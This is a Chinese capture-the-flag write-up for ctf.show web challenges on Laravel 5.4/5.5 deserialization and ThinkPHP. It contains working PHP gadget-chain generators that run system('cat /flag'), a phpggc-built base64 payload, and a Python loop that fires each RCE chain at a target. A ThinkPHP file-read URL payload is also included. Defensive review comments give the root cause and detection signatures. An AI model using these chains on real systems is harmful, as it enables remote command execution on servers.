web466

Laravel 5.4 版本,使用网上找到的 PoC:

<?php
/*
* @Author: Ikalovic 2298268003@qq.com
* @Date: 2025-09-25 23:19:08
* @LastEditors: Ikalovic 2298268003@qq.com
* @LastEditTime: 2025-09-25 23:22:16
* @FilePath: \undefinede:\CTF\ctf\web\知识积累\网站框架漏洞积累\Laravel5.4\poc2.php
* @Description: 这是默认设置,请设置`customMade`, 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE
*/
/**
 * Stand-in for the framework class Illuminate\Validation\Validator. It is declared under the
 * same namespace and class name so that serialize() records that class name in its output;
 * only the single property this listing needs is declared.
 *
 * NOTE(review): the framework code that later reads $extensions is not shown on this page.
 * The serialized object only matters if the target passes request data to unserialize().
 * Defensive takeaway: never unserialize client-supplied data. Use json_decode(), or at the
 * very least unserialize($data, ['allowed_classes' => false]).
 */
namespace Illuminate\Validation {
class Validator {
// Presumably treated by the framework as a name => callback map (confirm against the
// framework source). The constructor fills it with an empty-string key that points at
// the PHP function name 'system'.
public $extensions = [];
public function __construct() {
$this->extensions = ['' => 'system'];
}
}
}

// Second stand-in class: Illuminate\Broadcasting\PendingBroadcast, reduced to its two
// protected properties. The block ends by printing the serialized object, base64-encoded.
namespace Illuminate\Broadcasting {
use Illuminate\Validation\Validator;
class PendingBroadcast {
protected $events;
protected $event;
/**
 * @param string $cmd Value stored in $event; the call at the end of this block passes a
 *                    shell command line.
 */
public function __construct($cmd)
{
// $events receives the stand-in Validator declared earlier in this file, $event the string.
$this->events = new Validator();
$this->event = $cmd;
}
}
// Emits base64(serialize(object graph)). Detection note: the base64 form of a serialized PHP
// object ("O:<digits>:...") always begins with "Tzo", so a long request-path segment or
// parameter with that prefix is a useful signature for WAF rules and access-log review.
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>

使用方法:请求 /admin/<序列化串的 base64>。这个用法能生效,说明该路由把路径参数 base64 解码后直接交给了 unserialize()(推测,题目源码未贴出),这也是漏洞的根因。

cat /flag得到flag

web467

Laravel5.5版本

用网上链条:

<?php
// Stand-in for Illuminate\Broadcasting\PendingBroadcast (Laravel 5.5 variant of the listing):
// same two protected properties, but $events now holds a stand-in Dispatcher, which is
// declared in the Illuminate\Events namespace block further down this file.
//
// NOTE(review): as with any PHP object-injection payload, this only has an effect where the
// application unserializes attacker-controlled bytes. The fix on the application side is to
// stop doing that (json_decode(), or unserialize() with ['allowed_classes' => false]).
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
/**
 * @param string $cmd Stored in $event and also handed to the Dispatcher stand-in, which uses
 *                    it as an array key.
 */
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
// Prints base64(serialize(object graph)) for the command string given here.
echo base64_encode(serialize(new PendingBroadcast("cat /flag")));
}


// Stand-in for Illuminate\Events\Dispatcher carrying only the protected $listeners property.
namespace Illuminate\Events
{
class Dispatcher
{
// Presumably read by the framework as event name => list of listener callables (confirm
// against the framework source). Here the list holds the PHP function name 'system'.
protected $listeners;
/**
 * @param string $event Used as the single key of $listeners.
 */
public function __construct($event){
// Key and dispatched value are the same string, see PendingBroadcast::__construct above.
$this->listeners=[$event=>['system']];
}
}
}

web468

Laravel5.5版本

使用工具phpggc,poc:./phpggc Laravel/RCE3 system "cat /f* >1.txt"|base64

得到exp:

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIA
KgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6
Mzp7czo2OiIAKgBhcHAiO3M6MTQ6ImNhdCAvZiogPjEudHh0IjtzOjE3OiIAKgBkZWZhdWx0Q2hh
bm5lbCI7czoxOiJ4IjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntzOjE6IngiO3M6Njoi
c3lzdGVtIjt9fX0K

Web469-472

均可以用phpggc速通,写个py脚本遍历rce payload:

import os
import requests

# Iterates i = 1..19 over phpggc's numbered Laravel/RCE chains, sends each generated payload
# to the challenge's /admin/ route, then fetches 1.txt and looks for the flag prefix.
# NOTE(review): the indentation of this listing was lost in extraction. The statements after
# the `for` line presumably all belong to the loop body, with the two print() calls under
# the `if`. Confirm against the original post.
# Defender's view: in access logs this pattern is a burst of GETs to one route with long
# "Tzo..." path segments (base64 of a serialized PHP object), each followed by a probe for a
# newly created file in the web root. Both halves are alertable.
for i in range(1,20):
# Shells out to the local phpggc binary; the pipeline's stdout (base64 text) is read back.
data=os.popen(f"./phpggc Laravel/RCE{i} system 'cat /f* >1.txt'|base64").read()
# The payload is placed directly in the URL path after /admin/.
url = f"https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/admin/{data}"
# The response is discarded; success is judged only by the follow-up request.
requests.get(url)
res = requests.get("https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/1.txt").text
# 'ctfshow' is the flag prefix on this platform, so its presence means the chain ran.
if 'ctfshow' in res:
print(res)
print(f"RCE{i}success!")

web473

使用工具一把梭

payload:

https://6a7b4eda-5fa4-48c5-9991-7dfe90e70c8c.challenge.ctf.show?s=index/\think\Lang/load&file=/flag

web474-476

Thinkphp框架判断:访问http://xxx:8080/router.php,Thinkphp里面必定含有这个php文件。再次访问http://xxx:8080/?s=a

poc网址:https://blog.csdn.net/qq_67473072/article/details/131696323

推荐一把梭解决